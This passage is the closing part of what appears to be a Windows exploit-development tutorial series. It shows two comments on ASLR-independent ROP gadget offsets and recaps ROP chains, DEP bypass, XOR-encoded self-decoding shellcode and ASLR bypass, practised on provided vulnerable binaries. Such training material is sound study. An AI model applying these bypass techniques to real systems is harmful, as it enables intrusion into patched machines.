    # The gadget offsets (0x1f8c, 0x276f, etc.) are IDENTICAL.
    # Only the base changes. That's all ASLR bypass requires in this context.
Series Complete. You've gone from debugger basics through ROP chain construction, DEP bypass via VirtualAlloc+memcpy, shellcode XOR encoding with a self-decoding stub, and finally full ASLR bypass with runtime base address discovery — all on a fully patched Windows 11 24H2 machine. Vulnerable binary downloads: overflow-static.zip and overflow4.zip linked in the blog posts.